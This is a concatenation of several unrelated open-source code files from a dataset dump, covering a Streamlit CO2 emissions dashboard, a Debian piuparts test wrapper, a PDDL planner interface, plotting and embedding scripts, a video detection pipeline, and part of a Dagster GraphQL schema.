million tonnes',\n ))\n\n fig_choropleth.update_layout(\n title_text='' + 'CO2 Emission in ' + str(year) + ' (Sector in ' + select_sector + ')',\n geo=dict(\n showframe=True,\n showcoastlines=True,\n projection_type=\"orthographic\",\n showocean=True,\n oceancolor='deepskyblue',\n showlakes=True,\n lakecolor='lightblue'\n ),\n )\n\n fig_choropleth.update_layout(margin={\"r\": 30, \"t\": 30, \"l\": 30, \"b\": 30},\n title_font=dict(\n size=20,\n color='Blue')\n )\n return fig_choropleth\n\n\n@st.cache\ndef animated_bar(dataframe, dataset_column):\n df_region_area = dataframe[dataframe['iso_code'].isnull()]\n df_region_area = df_region_area.loc[(df_region_area[\"country\"] != \"French Equatorial Africa\") &\n (df_region_area[\"country\"] != \"French West Africa\") &\n (df_region_area[\"country\"] != \"Kuwaiti Oil Fires\") &\n (df_region_area[\"country\"] != \"Leeward Islands\") &\n (df_region_area[\"country\"] != \"Macao\") &\n (df_region_area[\"country\"] != \"Micronesia\") &\n (df_region_area[\"country\"] != \"Panama Canal Zone\") &\n (df_region_area[\"country\"] != \"Ryukyu Islands\") &\n (df_region_area[\"country\"] != \"St. Kitts-Nevis-Anguilla\")]\n df_region_area = df_region_area.fillna(0)\n df_region_area = df_region_area.pivot(index='year', columns='country', values=dataset_column)\n # create year as new column, some countries missing year in original datasets\n df_region_area['year'] = df_region_area.index\n # melt the data, now each country has the same year value\n df_region_area = df_region_area.melt(id_vars=['year'], var_name=['country'], value_name=dataset_column)\n cat_max_year = int(df_region_area[select_co2_sector].max()) * 1.1\n # plot an animated bar\n fig_animated = px.bar(df_region_area,\n x='country',\n y=dataset_column,\n color='country',\n animation_frame='year',\n animation_group='country',\n range_y=[0, cat_max_year],\n height=600,\n title=\"Running bar chart of \" + dataset_column + \"\"\n )\n return fig_animated\n\n\n# show the bar chart of top 10 / lowest 10\ndef show_bar_top_low_10(dataframe, data_column, year):\n st.subheader(\"Which countries are the Top 10 or Lowest 10?\")\n df = dataframe[dataframe['iso_code'].notnull()]\n df = df[df['iso_code'] != 'OWID_WRL']\n df_top10 = df.nlargest(10, data_column)\n df_low10 = df.nsmallest(10, data_column)\n high_or_low = st.radio('Select to display the Highest/Lowest 10 CO2 emission:',\n ['Highest 10', 'Lowest 10']) # .radio('Select to Highest 10 / Lowest 10', )\n fig_bar = go.Figure()\n if high_or_low == 'Highest 10':\n fig_bar = go.Figure(data=[go.Bar(\n x=df_top10['country'], y=df_top10[data_column],\n text=df_top10[data_column],\n textposition='auto',\n )])\n elif high_or_low == 'Lowest 10':\n fig_bar = go.Figure(data=[go.Bar(\n x=df_low10['country'], y=df_low10[data_column],\n text=df_low10[data_column],\n textposition='auto',\n )])\n\n fig_bar.update_traces(marker_color='rgb(51,255,149)', marker_line_color='rgb(8,48,107)',\n marker_line_width=1.5, opacity=0.6)\n fig_bar.update_layout(title_text='' + high_or_low\n + ' countries of CO2 emission in '\n + str(year)\n + ' (' + data_column + ')' + '',\n title_font=dict(size=18)\n )\n return fig_bar\n\n\n# scatter graph for GDP vs Population vs CO2 emission\ndef show_scatter_gdp_vs_pop(dataframe, data_column, year):\n # plot the scatter chart (GDP vs Population vs Selected category)\n st.subheader(\"Relationship between GDP, Population and CO2 emission\")\n df_gdp_pop_cat = dataframe[['year', 'country', 'iso_code', data_column, 'gdp', 'population']]\n df_gdp_pop_cat = 
df_gdp_pop_cat[df_gdp_pop_cat['year'] == year] # filter out the year\n df_gdp_pop_cat = df_gdp_pop_cat[df_gdp_pop_cat['iso_code'].notnull()] # filter out no iso code area\n df_gdp_pop_cat = df_gdp_pop_cat[df_gdp_pop_cat['iso_code'] != 'OWID_WRL'] # filter out world data\n # create an altair chart dictionary\n scatter_chart = alt.Chart(df_gdp_pop_cat).mark_circle().encode(\n x='gdp', y='population',\n size=alt.Size(data_column, scale=alt.Scale(range=[100, 2000])),\n color=alt.Color('country', legend=alt.Legend(columns=2)),\n opacity='country',\n tooltip=['country', 'gdp', 'population', data_column]).properties(\n title='GDP vs Population vs ' + data_column + ' in ' + str(year)\n ).interactive()\n\n scatter_chart = alt.layer(scatter_chart).configure_title(\n fontSize=20, anchor=\"middle\").configure_view(\n continuousHeight=500\n )\n # st.dataframe(df_gdp_pop_cat)\n return scatter_chart\n\n\n# plot the line chart\ndef show_line_chart(dataframe):\n list_country = dataframe['country'].unique().tolist()\n st.subheader(\"Time Series of CO2 emission\")\n col1, col2 = st.beta_columns(2)\n col1.subheader('Select Country')\n col2.subheader('Select Mode')\n\n select_list_country = col1.selectbox('', list_country, index=232)\n select_mode = col2.selectbox('', ['Trend', 'Cumulative'])\n\n df_world = pd.DataFrame()\n if len(select_list_country) == 0:\n df_world = dataframe[dataframe['iso_code'] == 'OWID_WRL']\n elif len(select_list_country) > 0:\n df_world = dataframe[dataframe['country'] == select_list_country]\n\n fig_line = go.Figure()\n if select_mode == 'Trend':\n fig_line.add_trace(go.Scatter(\n x=df_world['year'],\n y=df_world['co2'],\n name='World CO2', # Style name/legend entry with html tags\n connectgaps=True, # override default to connect the gaps\n line_shape='spline',\n fill='tonexty'\n ))\n fig_line.add_trace(go.Scatter(\n x=df_world['year'],\n y=df_world['trade_co2'],\n name='Trade CO2',\n line_shape='spline',\n line=dict(dash='dash'),\n fill='tonexty'\n ))\n fig_line.add_trace(go.Scatter(\n x=df_world['year'],\n y=df_world['cement_co2'],\n name='Cement CO2',\n line_shape='spline',\n line=dict(dash='dash'),\n fill='tonexty'\n ))\n fig_line.add_trace(go.Scatter(\n x=df_world['year'],\n y=df_world['coal_co2'],\n name='Coal CO2',\n line_shape='spline',\n line=dict(dash='dash'),\n fill='tonexty'\n ))\n fig_line.add_trace(go.Scatter(\n x=df_world['year'],\n y=df_world['flaring_co2'],\n name='Flaring CO2',\n line_shape='spline',\n line=dict(dash='dash'),\n fill='tonexty'\n ))\n fig_line.add_trace(go.Scatter(\n x=df_world['year'],\n y=df_world['gas_co2'],\n name='GAS CO2',\n line_shape='spline',\n line=dict(dash='dash'),\n fill='tonexty'\n ))\n fig_line.add_trace(go.Scatter(\n x=df_world['year'],\n y=df_world['oil_co2'],\n name='Oil CO2',\n line_shape='spline',\n line=dict(dash='dash'),\n fill='tonexty'\n ))\n fig_line.add_trace(go.Scatter(\n x=df_world['year'],\n y=df_world['other_industry_co2'],\n name='Other industry CO2',\n line_shape='spline',\n line=dict(dash='dash'),\n fill='tonexty'\n ))\n elif select_mode == 'Cumulative':\n fig_line.add_trace(go.Scatter(\n x=df_world['year'],\n y=df_world['cumulative_co2'],\n name='Cumulative CO2', # Style name/legend entry with html tags\n connectgaps=True, # override default to connect the gaps\n line_shape='spline',\n fill='tonexty'\n ))\n fig_line.add_trace(go.Scatter(\n x=df_world['year'],\n y=df_world['cumulative_coal_co2'],\n name='Cumulative Coal CO2',\n line_shape='spline',\n line=dict(dash='dash'),\n fill='tonexty'\n ))\n 
fig_line.add_trace(go.Scatter(\n x=df_world['year'],\n y=df_world['cumulative_cement_co2'],\n name='Cumulative cement CO2',\n line_shape='spline',\n line=dict(dash='dash'),\n fill='tonexty'\n ))\n fig_line.add_trace(go.Scatter(\n x=df_world['year'],\n y=df_world['cumulative_flaring_co2'],\n name='Cumulative flaring CO2',\n line_shape='spline',\n line=dict(dash='dash'),\n fill='tonexty'\n ))\n fig_line.add_trace(go.Scatter(\n x=df_world['year'],\n y=df_world['cumulative_gas_co2'],\n name='Cumulative GAS CO2',\n line_shape='spline',\n line=dict(dash='dash'),\n fill='tonexty'\n ))\n fig_line.add_trace(go.Scatter(\n x=df_world['year'],\n y=df_world['cumulative_oil_co2'],\n name='Cumulative Oil CO2',\n line_shape='spline',\n line=dict(dash='dash'),\n fill='tonexty'\n ))\n fig_line.update_layout(\n title='Time series of CO2 emission with sub-sectors (' + select_list_country + ') (' + select_mode + ')',\n legend=dict(y=1, font_size=14),\n xaxis=dict(rangeslider=dict(visible=True),\n title_font=dict(size=20))\n )\n return fig_line\n\n\ndata1_co2 = load_data()\n\n# page layout setting\nst.header('COMPX532A - Final Project')\nst.subheader('Purpose of the project')\nst.text(chart_desciption.project_background())\nst.subheader('Data Source Description')\nst.info(chart_desciption.data_information())\n\ndf = trim_datasets(data1_co2)\nmin_y, max_y = get_df_year_mx_mi(df)\n\n# side bar setting\nst.sidebar.header('Setting Option')\nselect_year = st.sidebar.slider('Year', min_y, max_y, max_y, 1)\nselect_country = st.sidebar.multiselect('Select Country:', df['country'].unique().tolist())\n# st.sidebar.write(len(data1_co2['country'].unique().tolist()))\n\n# filter dataframe by select country\nif len(select_country) > 0:\n df = df[df['country'].isin(select_country)]\nelif len(select_country) == 0:\n pass\ncheck_box_show(df)\nst.subheader(\"CO2 Emission in the world\")\ndf, df_columns_list = control_dataframe(df)\ndf_columns_list.pop()\n# add select box of select sector in side bar\nselect_co2_sector = st.sidebar.selectbox('Select sector in CO2 Emission', df_columns_list)\nst.sidebar.write('🧠 Created by Andrew Choi.
©Copyright reserved.',unsafe_allow_html=True)\n\n\n\n# plot the graph\nst.plotly_chart(get_co2_choropleth_map(df, select_year, select_co2_sector))\nwith st.beta_expander(\"🗺️Choropleth Map Explanation\"):\n st.markdown(chart_desciption.choropleth_map_explanation(), unsafe_allow_html=True)\n\n#explanation of Bar chart\nst.plotly_chart(show_bar_top_low_10(df, select_co2_sector, select_year))\nwith st.beta_expander(\"📊 Top 10/ Lowest 10 Bar chart Explanation\"):\n st.markdown(chart_desciption.top_low_bar_chart_explanation(), unsafe_allow_html=True)\n\n#explanation of Scatter chart\nst.altair_chart(show_scatter_gdp_vs_pop(data1_co2, select_co2_sector, select_year), use_container_width=True)\nwith st.beta_expander(\"🔵🔴 Scatter chart (Relationship among CO2, GDP, Population) Explanation\"):\n st.markdown(chart_desciption.scatter_chart_explanation(), unsafe_allow_html=True)\n\n#explanation of line chart\nst.plotly_chart(show_line_chart(data1_co2), use_container_width=True)\nwith st.beta_expander(\"📈 Line chart (trend/accumulated of CO2 emission) Explanation\"):\n st.markdown(chart_desciption.line_chart_explanation(), unsafe_allow_html=True)\n\n#Animated bar chart\nst.subheader(\"Animated Bar chart (shows the volume/change over time)\")\nwith st.spinner('Please wait, it is generating'):\n try:\n st.plotly_chart(animated_bar(data1_co2, select_co2_sector), use_container_width=True)\n except:\n st.error(\"You have select a sector that no animated graph.\")\n\nwith st.beta_expander(\"🏃‍♂️🏃‍♀️📊Animated Bar chart (change over time) Explanation\"):\n st.markdown(chart_desciption.animated_bar_explanation(), unsafe_allow_html=True)","repo_name":"choi0623hk/DataVisualisation_CO2_emission","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":16977,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"37350037959","text":"import logging\nimport os\nimport uuid\nfrom contextlib import (\n ExitStack,\n)\n\nfrom vectis.apt import (\n AptSource,\n)\nfrom vectis.worker import (\n ContainerWorker,\n FileProvider,\n HostWorker,\n InteractiveWorker,\n)\n\nlogger = logging.getLogger(__name__)\n\n\nclass Binary:\n\n def __init__(\n self,\n name,\n *,\n deb=None):\n self.deb = deb\n self.name = name\n\n def __str__(self):\n return self.name\n\n\nclass PiupartsWorker(FileProvider, ContainerWorker):\n\n def __init__(\n self,\n *,\n architecture,\n mirrors,\n suite,\n tarball,\n components=(),\n extra_repositories=(),\n worker=None):\n super().__init__(mirrors=mirrors, suite=suite)\n\n if worker is None:\n worker = self.stack.enter_context(HostWorker())\n\n self.__bound = set()\n self.__cached_copies = {}\n self.apt_related_argv = []\n self.argv = [\n 'piuparts',\n '--arch',\n architecture,\n '-b',\n tarball,\n ]\n self.components = components\n self.extra_repositories = extra_repositories\n self.worker = worker\n\n assert isinstance(self.worker, InteractiveWorker)\n\n def _open(self):\n super()._open()\n self.set_up_apt()\n\n def set_up_apt(self):\n argv = []\n\n for ancestor in self.suite.hierarchy:\n if self.components:\n filtered_components = (\n set(self.components) & set(ancestor.all_components))\n else:\n filtered_components = ancestor.components\n\n uri = self.mirrors.lookup_suite(ancestor)\n\n source = AptSource(\n components=filtered_components,\n suite=ancestor.apt_suite,\n type='deb',\n trusted=ancestor.apt_trusted,\n uri=uri,\n )\n\n if ancestor is self.suite.hierarchy[-1]:\n logger.info(\n '%r: %s => -d %s --mirror %s',\n self, 
ancestor, source.suite,\n source.get_piuparts_mirror_option())\n argv.append('-d')\n argv.append(source.suite)\n argv.append('--mirror')\n argv.append(source.get_piuparts_mirror_option())\n else:\n logger.info('%r: %s => %s', self, ancestor, source)\n argv.append('--extra-repo')\n argv.append(str(source))\n\n for line in self.extra_repositories:\n argv.append('--extra-repo')\n argv.append(line)\n\n self.apt_related_argv = argv\n self.install_apt_keys()\n\n def install_apt_key(self, apt_key):\n logger.debug('TODO: piuparts does not have an option to install '\n 'apt keys')\n\n def call_piuparts(\n self,\n *,\n binaries,\n output_dir=None):\n\n packages = []\n\n for b in binaries:\n if b.deb is None:\n packages.append(b.name)\n else:\n packages.append(self.make_file_available(b.deb))\n\n argv = self.argv[:]\n\n for b in binaries:\n if b.deb is None:\n argv.append('--apt')\n break\n\n if output_dir is not None:\n argv.append('-l')\n argv.append(output_dir + '/piuparts.log')\n\n return (self.worker.call(argv + self.apt_related_argv + packages) == 0)\n\n def new_directory(self, prefix='', tmpdir=None):\n # assume /tmp is initially empty and mktemp won't collide\n d = self.worker.new_directory(prefix, tmpdir)\n self.argv.append('--bindmount={}'.format(d))\n self.__bound.add(d)\n return d\n\n def make_file_available(\n self,\n filename,\n *,\n cache=False,\n in_dir=None,\n owner=None):\n if in_dir is None:\n in_dir = self.new_directory()\n\n if cache:\n in_guest = self.__cached_copies.get((filename, in_dir))\n if in_guest is not None:\n return in_guest\n\n unique = str(uuid.uuid4())\n in_guest = self.worker.make_file_available(\n filename, cache=cache, in_dir=in_dir)\n\n if in_dir not in self.__bound:\n self.argv.append('--bindmount={}/{}'.format(in_dir, unique))\n\n if cache:\n self.__cached_copies[(filename, in_dir)] = in_guest\n\n return in_guest\n\n def make_dsc_file_available(self, filename, owner=None):\n d, f = self.worker.make_dsc_file_available(filename)\n self.argv.append('--bindmount={}'.format(d))\n return d, f\n\n def make_changes_file_available(self, filename, owner=None):\n d, f = self.worker.make_changes_file_available(filename)\n self.argv.append('--bindmount={}'.format(d))\n return d, f\n\n\ndef run_piuparts(\n *,\n components,\n mirrors,\n storage,\n suite,\n tarballs,\n vendor,\n worker,\n architecture=None,\n binaries=(),\n extra_repositories=(),\n output_logs=None):\n failures = []\n # We may need to iterate these more than once\n binaries = list(binaries)\n\n with ExitStack() as stack:\n stack.enter_context(worker)\n worker.check_call([\n 'env',\n 'DEBIAN_FRONTEND=noninteractive',\n 'apt-get',\n '-y',\n '-t', worker.suite.apt_suite,\n 'install',\n\n 'piuparts',\n ])\n\n for basename in tarballs:\n tarball = os.path.join(\n storage,\n architecture,\n str(vendor),\n str(suite.hierarchy[-1]),\n basename)\n\n if not os.path.exists(tarball):\n logger.info('Required tarball %s does not exist',\n tarball)\n continue\n\n piuparts = stack.enter_context(\n PiupartsWorker(\n architecture=architecture,\n components=components,\n extra_repositories=extra_repositories,\n mirrors=mirrors,\n suite=suite,\n tarball=worker.make_file_available(\n tarball, cache=True),\n worker=worker,\n )\n )\n\n for mode in ('install-purge',):\n if output_logs is None:\n output_dir = None\n else:\n output_dir = os.path.join(\n output_logs,\n 'piuparts_{}_{}_{}'.format(\n mode, basename, architecture))\n\n output_on_worker = worker.new_directory()\n\n if not piuparts.call_piuparts(\n binaries=binaries,\n 
output_dir=output_on_worker,\n ):\n if output_dir is None:\n failures.append(mode)\n else:\n failures.append(output_dir)\n\n if output_dir is not None:\n worker.copy_to_host(\n os.path.join(output_on_worker, ''),\n os.path.join(output_dir, ''),\n )\n\n return failures\n","repo_name":"smcv/vectis","sub_path":"vectis/piuparts.py","file_name":"piuparts.py","file_ext":"py","file_size_in_byte":7499,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"3732371005","text":"import subprocess\nimport os\nfrom highlevel_planning_py.exploration.logic_tools import parse_plan\n\n\ndef pddl_planner(domain_file, problem_file, action_specs, bin_dir, debug_print=False):\n try:\n res = subprocess.check_output(\n [\n os.path.join(bin_dir, \"ff\"),\n \"-s\",\n \"0\",\n \"-o\",\n domain_file,\n \"-f\",\n problem_file,\n ]\n )\n if type(res) is not str:\n res = res.decode(\"utf-8\")\n except subprocess.CalledProcessError as e:\n # Check if empty plan solves it\n output = e.output if type(e.output) is str else e.output.decode(\"utf-8\")\n empty_idx = output.find(\"The empty plan solves it\")\n if empty_idx > -1:\n # print(\"Empty plan solves the goal.\")\n return []\n else:\n if debug_print:\n print(\"Planning failed: \")\n print(output)\n return False\n try:\n res = cut_string_before(res, \"ff: found legal plan as follows\", complain=True)\n except NameError:\n # print(\"Planning failed: \")\n # print(res)\n return False\n try:\n res = cut_string_before(res, \"0:\", complain=True)\n except NameError:\n # Empty plan solves this problem\n return []\n res = cut_string_at(res, \"time spent\")\n res = res.split(\"\\n\")\n for i in range(len(res)):\n res[i] = res[i].strip().lower()\n while True:\n try:\n res.remove(\"\")\n except ValueError:\n break\n # print(res)\n sequence, parameters = parse_plan(res, action_specs)\n return sequence, parameters\n\n\ndef cut_string_before(string, query, complain=False):\n # Finds query in string and cuts everything before it.\n start_idx = string.find(query)\n if start_idx > -1:\n string = string[start_idx:]\n elif complain:\n raise NameError(\"Query not found\")\n return string\n\n\ndef cut_string_at(string, query):\n # Finds query in string and cuts it away, together with everything that comes behind.\n start_idx = string.find(query)\n if start_idx > -1:\n string = string[:start_idx]\n return string\n","repo_name":"ethz-asl/high_level_planning","sub_path":"highlevel_planning_ros/src/highlevel_planning_py/pddl_interface/planner_interface.py","file_name":"planner_interface.py","file_ext":"py","file_size_in_byte":2220,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"3194599588","text":"import utils as ut\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom scipy import stats\n\n# Moving average for GPU data (generalize later)\n\n# Pick a machine\nmachine = \"GPU\" # \"CPU\"\nfile_prefix = \"vec_ops.n6_g1_c7_a1.\"\n# file_path = \"vec-ops-latency\"\nfile_path = \"waitforgpu-latency\"\n\n# machine = \"CPU\"\n# file_prefix = \"vec_ops.n2_g0_c21_p42.\"\n# file_path = \"cpu-flush-cache\"\n\n# Pick an operation \n# operation = \"VecDot\"\n# count = 1\noperation = \"VecAXPY\"\ncount = 3\n\n# Get the data\nsm = range(1000, 100001, 100)\nmd = range(100000, 10000001, 10000) \nlg = range(10000000, 100000001, 100000)\nvec_sizes = sm + md + lg\n\nall_data = []\nfor size in vec_sizes:\n\tall_data.append(float(ut.get_time(\"../data/\" + file_path + \"/\" + file_prefix + 
str(size), operation, count)))\n\n# Compute the moving average\nspan_size = 10\ninternal_sizes = vec_sizes[span_size: -span_size]\nmoving_average = []\n\nfor vec_size in internal_sizes: # Loop through internal data\n\tind = vec_sizes.index(vec_size) # Get place in global vector\n\tmoving_data = all_data[ind - span_size: ind + span_size] # Get local data from global data\n\tavg = sum(moving_data)/len(moving_data) # Compute average of local data\n\tmoving_average.append(avg)\n\n# Make the plot\nfig = plt.figure()\nax = fig.add_subplot(111)\n\nplt.plot(vec_sizes, all_data, linestyle=\"none\", marker=\".\", color=\"grey\", label=\"Data\")\nplt.plot(internal_sizes, moving_average, color=\"black\", label=\"Moving average\")\nplt.title(machine + \" \" + operation + \" execution time\", fontsize=12)\nplt.xlabel(\"Vector size\", fontsize=12)\nplt.ylabel(\"Seconds\", fontsize=12)\nplt.legend(loc=\"upper left\", fontsize=12, frameon=False)\n# plt.xscale('log')\n# plt.xlim([8e2, 1.2e7])\n# ax.ticklabel_format(axis=\"both\", style=\"sci\", scilimits=(0,0))\n# ax.xaxis.set_major_locator(plt.MaxNLocator(5))\n\nplt.tight_layout()\n# plt.savefig(\"../plots/\" + operation + \"_\" + machine + \"_moving_average.png\")\nplt.show()\n","repo_name":"hmmorgan/summit","sub_path":"python/moving-average.py","file_name":"moving-average.py","file_ext":"py","file_size_in_byte":1899,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"70878856808","text":"import argparse\nimport os\nimport pandas as pd\nimport sys\nimport torch\n\nfrom OpenKE.openke.module.model import TransE, TransR, TransH, SimplE\nfrom OpenKE.openke.data import TrainDataLoader, TestDataLoader\n\n\ndef load_embeddings(_fb_path, _model_path, _dim, _mt):\n train_dataloader = TrainDataLoader(in_path=_fb_path,\n nbatches=100,\n threads=1,\n sampling_mode=\"normal\",\n bern_flag=1,\n filter_flag=1,\n neg_ent=25,\n neg_rel=0)\n if _mt == 'transe':\n transe = TransE(ent_tot=train_dataloader.get_ent_tot(),\n rel_tot=train_dataloader.get_rel_tot(),\n dim=_dim,\n p_norm=1,\n norm_flag=True)\n transe.load_checkpoint(_model_path)\n _ent_embds = transe.ent_embeddings.weight\n _rel_embds = transe.rel_embeddings.weight\n elif _mt == 'transr':\n transr = TransR(ent_tot=train_dataloader.get_ent_tot(),\n rel_tot=train_dataloader.get_rel_tot(),\n dim_e=_dim,\n dim_r=_dim,\n p_norm=1,\n norm_flag=True)\n transr.load_checkpoint(_model_path)\n _ent_embds = transr.ent_embeddings.weight\n _rel_embds = transr.rel_embeddings.weight\n elif _mt == 'transh':\n transh = TransH(ent_tot=train_dataloader.get_ent_tot(),\n rel_tot=train_dataloader.get_rel_tot(),\n dim=_dim,\n p_norm=1,\n norm_flag=True)\n transh.load_checkpoint(_model_path)\n _ent_embds = transh.ent_embeddings.weight\n _rel_embds = transh.rel_embeddings.weight\n elif _mt == 'simple':\n simple = SimplE(ent_tot=train_dataloader.get_ent_tot(),\n rel_tot=train_dataloader.get_rel_tot(),\n dim=_dim)\n simple.load_checkpoint(_model_path)\n _ent_embds = simple.ent_embeddings.weight\n _rel_embds = simple.rel_embeddings.weight\n return _ent_embds, _rel_embds\n\n\ndef run_and_save(_dim, _mt, _ds):\n wd = os.path.normpath(os.getcwd() + os.sep + os.pardir)\n if _ds == 'riedel':\n fb_path = os.path.join(wd, \"data\", \"RESIDE_KG/\")\n elif _ds == 'gids':\n fb_path = os.path.join(wd, \"data\", \"GIDS_KG/\")\n else:\n print('Invalid data set, please run the preprocessing steps.')\n sys.exit()\n if _mt == 'transr':\n model_path = os.path.join(wd, \"kg-embeddings\", 
\"checkpoints\", \"{m}_{d}_{d}_{s}.ckpt\".format(m=_mt,\n d=_dim,\n s=_ds))\n else:\n model_path = os.path.join(wd, \"kg-embeddings\", \"checkpoints\", \"{m}_{d}_{s}.ckpt\".format(m=_mt,\n d=_dim,\n s=_ds))\n out_path = os.path.join(wd, \"kg-embeddings\", \"data\")\n entity_emb, rel_emb = load_embeddings(fb_path, model_path, _dim, _mt)\n torch.save(entity_emb, os.path.join(out_path, 'entities_{m}_{d}_{s}.pt'.format(m=str(_mt), d=_dim, s=_ds)))\n torch.save(rel_emb, os.path.join(out_path, 'relations_{m}_{d}_{s}.pt'.format(m=str(_mt), d=_dim, s=_ds)))\n print(entity_emb.shape)\n print(rel_emb.shape)\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(prog=\"build_node_space\",\n description=\"Builds vector spaces of kg embeddings\")\n parser.add_argument('-d', '--dimension', required=False, type=int, default=200,\n help='Embedding dimension for h, r and t',\n dest='dim')\n parser.add_argument('-m', '--model', required=True, type=str, default='transe',\n help='Knowledge graph embedding model type',\n dest='mt')\n parser.add_argument('-s', '--set', required=True, type=str, default='reside',\n help='Dataset type type',\n dest='ds')\n args = parser.parse_args()\n run_and_save(args.dim, args.mt, args.ds)\n","repo_name":"akalino/semantic-structural-sentences","sub_path":"kg-embeddings/build_node_space.py","file_name":"build_node_space.py","file_ext":"py","file_size_in_byte":4540,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"71227742888","text":"from video_capture import C_VIDEO_UNIT\nfrom preprocessing import C_PREPROCESSING\nfrom Object_detection import C_DETECTION\nfrom tracking import C_TRACKER\nfrom setting import *\nfrom utils import *\nimport cv2\nfrom Detection_Models.YOLO import C_DETECTION_YOLO as YOLO\n# \n# @track\ndef main():\n # groundtruth_box = C_PREPROCESSING.VOT2013_read_groundtruth_file(FILE_ADDRESS_DEEP_GROUNDTHRUTH)\n \n detection = C_DETECTION(DETECTION_METHOD)\n\n video = C_VIDEO_UNIT(INPUT_VIDEO_SNOURCE)\n\n acc_per_frame = []\n ret, frame = video.get_frame()\n image_size = frame.shape \n frame_number = 0\n time_sum = 0\n\n while True:\n ret, frame = video.get_frame()\n\n frame_number += 1\n if not ret:\n break\n \n print(frame_number)\n # Preprocessing \n # frame = C_PREPROCESSING.resize(frame, min(400, frame.shape[1]))\n # frame = C_PREPROCESSING.Color_Conversion(frame,\"GRAY\") //deep network needs the color image. 
If we feed grayscale image, there will be error in code.\n\n\n # t1 = time.time()\n \n # Detection\n predicted_box,frame = detection.Detection_BoundingBox(frame)\n if frame_number % 20 == 0:\n print(\"change detection method to Deep_YOLO\")\n detection.Switch_detection(\"Deep_Yolo\")\n if frame_number % 40 == 0:\n print(\"change detection method to HOG_Pedestrian\")\n detection.Switch_detection(\"HOG_Pedestrian\")\n # DETECTION_METHOD = \"Deep_Yolo\"\n\n # t2 = time.time()\n # time_sum += t2-t1\n\n # gt = correct_position(groundtruth_box[frame_number-1])\n # tmpgt = correct_position(groundtruth_box[frame_number-1])\n # cv2.rectangle(frame, (gt[0], gt[1]), (gt[2],gt[3]), (0,0,0),0)\n # max_idx, max_acc = 0, 0\n # for i, bb in enumerate(predicted_box):\n # accuracy = box_iou2(correct_position(bb), correct_position(gt))\n # if max_acc0:\n # pb = correct_position(predicted_box[max_idx])\n # cv2.rectangle(frame, (pb[0], pb[1]), (pb[2],pb[3]), (155,255,12),1)\n \n \n # Post Processing\n # frame = C_PREPROCESSING.Color_Conversion(frame,\"GRAY\")\n \n # Output \n cv2.imshow(\"output\", frame)\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break #esc to quit\n\n # print(\"average acc:\",np.average(acc_per_frame),\", max acc: \",max(acc_per_frame),\", min acc: \",min(acc_per_frame), \", number of frames with zero accuracy: \",len(acc_per_frame)-np.count_nonzero(acc_per_frame))\n # print(\"The average processing time for every frame is\",np.divide(time_sum, frame_number, dtype=np.float), 'and the total number of frames is ', frame_number)\n # print('Also, the total frames (size=',image_size,') are processin in ',time_sum,'seconds')\n cv2.destroyAllWindows() \n return 2\n \nif __name__ == \"__main__\": \n # t1=time.time() \n a=main()\n # t2=time.time()\n # print('pipeline time:', t2-t1)\n \n\n \n","repo_name":"mmoha014/Video-Analytics-system","sub_path":"pipeline.py","file_name":"pipeline.py","file_ext":"py","file_size_in_byte":3176,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"72878842088","text":"#link : https://codeforces.com/problemset/problem/1481/A\n#author : Mohamed Ibrahim\n\nt = int(input())\nfor i in range(t):\n x,y = map(int,input().split())\n s = input()\n if -s.count(\"D\") <= y <= s.count(\"U\") and -s.count(\"L\") <= x <= s.count(\"R\"):print(\"YES\")\n else:print(\"NO\")\n \n","repo_name":"M0hamedIbrahim1/Problem-Solving-Python-","sub_path":"CodeForces/A. Space Navigation.py","file_name":"A. 
Space Navigation.py","file_ext":"py","file_size_in_byte":285,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"53"} +{"seq_id":"9886431847","text":"import dagster._check as check\nimport graphene\nfrom dagster._core.host_representation import ExternalExecutionPlan\nfrom dagster._core.snap import ExecutionStepInputSnap, ExecutionStepOutputSnap, ExecutionStepSnap\n\nfrom .metadata import GrapheneMetadataItemDefinition\nfrom .util import ResolveInfo, non_null_list\n\n\nclass GrapheneExecutionStepOutput(graphene.ObjectType):\n name = graphene.NonNull(graphene.String)\n\n class Meta:\n name = \"ExecutionStepOutput\"\n\n def __init__(self, step_output_snap):\n super().__init__()\n self._step_output_snap = check.inst_param(\n step_output_snap, \"step_output_snap\", ExecutionStepOutputSnap\n )\n\n def resolve_name(self, _graphene_info: ResolveInfo):\n return self._step_output_snap.name\n\n\nclass GrapheneExecutionStepInput(graphene.ObjectType):\n name = graphene.NonNull(graphene.String)\n dependsOn = non_null_list(lambda: GrapheneExecutionStep)\n\n class Meta:\n name = \"ExecutionStepInput\"\n\n def __init__(self, step_input_snap, external_execution_plan):\n super().__init__()\n self._step_input_snap = check.inst_param(\n step_input_snap, \"step_input_snap\", ExecutionStepInputSnap\n )\n self._external_execution_plan = check.inst_param(\n external_execution_plan, \"external_execution_plan\", ExternalExecutionPlan\n )\n\n def resolve_name(self, _graphene_info: ResolveInfo):\n return self._step_input_snap.name\n\n def resolve_dependsOn(self, _graphene_info: ResolveInfo):\n return [\n GrapheneExecutionStep(\n self._external_execution_plan,\n self._external_execution_plan.get_step_by_key(key),\n )\n # We filter at this layer to ensure that we do not return outputs that\n # do not exist in the execution plan\n for key in filter(\n self._external_execution_plan.key_in_plan,\n self._step_input_snap.upstream_step_keys,\n )\n ]\n\n\nclass GrapheneStepKind(graphene.Enum):\n COMPUTE = \"COMPUTE\"\n UNRESOLVED_MAPPED = \"UNRESOLVED_MAPPED\"\n UNRESOLVED_COLLECT = \"UNRESOLVED_COLLECT\"\n\n class Meta:\n name = \"StepKind\"\n\n @property\n def description(self):\n if self == GrapheneStepKind.COMPUTE:\n return \"This is a user-defined computation step\"\n if self == GrapheneStepKind.UNRESOLVED_MAPPED:\n return \"This is a mapped step that has not yet been resolved\"\n if self == 